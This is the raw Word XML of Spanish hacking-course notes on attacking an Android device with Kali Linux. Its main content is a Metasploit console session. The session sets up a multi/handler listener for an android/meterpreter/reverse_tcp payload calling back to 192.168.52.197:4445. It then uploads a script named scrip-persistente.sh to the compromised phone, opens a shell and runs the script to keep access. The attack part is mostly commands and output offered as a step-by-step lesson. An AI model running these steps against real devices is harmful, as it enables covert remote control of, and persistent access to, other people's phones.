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327DF" w14:textId="6C83B7DB" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:permStart w:id="892481783" w:edGrp="everyone"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E85393" wp14:editId="0F62BA3A">
                <wp:extent cx="5734050" cy="1295400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5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556930820" w:edGrp="everyone"/>
                            <w:r w:rsidRPr="0032529E">
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5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urso hacking a Dispositivo con Kali Linux </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5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29E">
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5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utaxion</w:t>
                            </w:r>
                            <w:permEnd w:id="5569308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E8539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width:451.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" filled="f" stroked="f">
                <v:fill o:detectmouseclick="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DC53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5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ermStart w:id="556930820" w:edGrp="everyone"/>
                      <w:r w:rsidRPr="0032529E">
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5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urso hacking a Dispositivo con Kali Linux </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5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29E">
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5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putaxion</w:t>
                      </w:r>
                      <w:permEnd w:id="556930820"/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permEnd w:id="892481783"/>
    </w:p>
    <w:p w14:paraId="2BED8282" w14:textId="4364132C" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B48FAA" w14:textId="77777777" w:rsidR="00BF72A6" w:rsidRDefault="009A65A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF9F0C3" wp14:editId="02962683">
            <wp:extent cx="6067425" cy="582917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tax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34" cy="58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4FD1" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="4F1ABD59" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:r>
        <w:t>Bien en esta case se ven como subir un archivo para crear una persistencia en el ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDED08E" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="31F3AD88" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="6C54FAFE" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf5 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DD225" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set payload android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE39042" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822245F" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LhOST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.52.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA15AC" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LhOST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; 192.168.52.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E3410" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LPORT 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A015B8" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPORT =&gt; 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DE765" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52E654" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435B2026" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19ED208F" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/storage/emulated/legacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906BDC1" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; upload /root/Desktop/scrip-persistente.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA6A9B" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC89FD0" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Listing: /storage/emulated/legacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A7D0CC" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01DAAE" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F245E" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73931E36" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A65A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFAE551" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scrip-persistente.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C3D40" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C = PARA CERRAR LA SECCION Y CON ESO SE FINALIZA ESTA CLASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B069E96" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0"/>
    <w:p w14:paraId="67FEAE44" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0"/>
    <w:p w14:paraId="30705560" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60880237" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A65A0" w:rsidSect="009E69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20-01-28T23:41:00Z" w:initials="U">
    <w:p w14:paraId="7865A683" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Textocomentario"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="009E6905">
        <w:t xml:space="preserve">Pablo Ezequiel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6905">
        <w:t>Cordob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65A683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A0"/>
    <w:rsid w:val="00226754"/>
    <w:rsid w:val="0032529E"/>
    <w:rsid w:val="009A65A0"/>
    <w:rsid w:val="009E6905"/>
    <w:rsid w:val="00A13917"/>
    <w:rsid w:val="00B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C596"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0FE223E6-DC51-4EAB-9338-586ABEAD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6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6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9A65A0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9A65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A65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A65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A65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65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65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5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65A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7648-15AB-49B9-910D-A45CF16C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1-29T02:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-29T03:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>